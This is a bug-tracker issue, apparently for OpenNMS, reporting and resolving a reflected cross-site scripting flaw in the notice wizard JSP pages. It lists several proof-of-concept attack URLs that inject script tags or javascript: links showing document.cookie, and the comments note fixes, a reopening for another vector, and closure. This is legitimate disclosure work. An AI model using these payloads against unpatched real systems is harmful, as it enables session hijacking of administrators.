Skip to:

  1. Skip to Jira Navigation
  2. Skip to Side Navigation
  3. Skip to Main Content

Reflected XSS in webapp notice wizard

Description

A customer's internal pen-testing has identified a reflected cross-site scripting vulnerability in the notice wizard flow of the main OpenNMS webapp.

Steps to reproduce:

1) Log in as an admin user
2) Paste the following primary attack URL into your browser's address bar, substituting protocol, hostname, and port as needed:

[http://localhost:8980/opennms/admin/notification/noticeWizard/buildPathOutage.jsp?newRule=IPADDR+IPLIKE+*.*.*.*%22%3e%3cscript%3ealert(document.cookie)%3c/script%3e&showNodes=on]

Expected result: A weird-looking rule renders into the filter rule input
Actual result: JS popup dumping the user's cookies

3) Paste the following secondary attack URL into your browser's address bar, adjusted as needed:

[http://localhost:8980/opennms/admin/notification/noticeWizard/buildPathOutage.jsp?newRule=IPADDR+IPLIKE+*.*.*.*]"><h1><a/href=javascript:alert(document.cookie)>Click Here!!!</a></h1>&showNodes=on]

Expected result: A weird-looking rule renders into the filter rule input
Actual result: Weird-looking rule renders, followed by a hyperlink which, when clicked, results in a JS popup dumping the user's cookies

4) From the Admin menu, click on Configure Notifications -> Configure Event Notifications. Click the "Add New Event Notification" button (these preliminary steps populate the necessary objects in the user's web session to set up the attack). Then, paste the following attack URL into your browser's address bar, adjusted as needed:

[http://localhost:8980/opennms/admin/notification/noticeWizard/buildPathOutage.jsp?newRule=IPADDR+IPLIKE+*.*.*.*&criticalIp=1.2.3.4%27%3e%3cscript%3ealert(document.cookie)%3c/script%3e&showNodes=on]

Expected result: A weird-looking value renders into the "Critical Path IP Address"
Actual result: JS popup dumping the user's cookies

5) Paste the following attack URL into your browser's address bar:

[http://localhost:8980/opennms/admin/notification/noticeWizard/buildRule.jsp?newRule=IPADDR+IPLIKE+*.*.*.*%22]><script>alert(document.cookie)</script>

Expected result: Weirdness in the filter rule input field
Actual result: JS popup dumping the user's cookies

Acceptance / Success Criteria

None

Lucidchart Diagrams

Activity

Show:

Benjamin Reed November 9, 2021 at 4:22 PM

this got merged, re-closing

Jeff Gehlbach August 23, 2021 at 3:47 PM

Jeff Gehlbach August 23, 2021 at 3:44 PM

Reopening after receiving and reproducing a follow-on report of an additional attack vector via attack URL:

http://localhost:8980/opennms/admin/notification/noticeWizard/validatePathOutage.jsp?newRule=(IPADDR+IPLIKE+*.*.*.*)%3C%3CSCRIPT%3Ealert(document.cookie);//%3C%3C/SCRIPT%3E&criticalSvc=ICMP&showNodes=on

Jeff Gehlbach August 10, 2021 at 3:15 PM

PR merged.

Jeff Gehlbach August 6, 2021 at 8:16 PM
Edited

Fixed

Details

Assignee

Reporter

Labels

Docs Needed

No

Doc Backlog Status

Components

Fix versions

Affects versions

Priority

PagerDuty

Created August 6, 2021 at 8:11 PM
Updated June 21, 2023 at 7:48 PM
Resolved November 9, 2021 at 4:22 PM

Flag notifications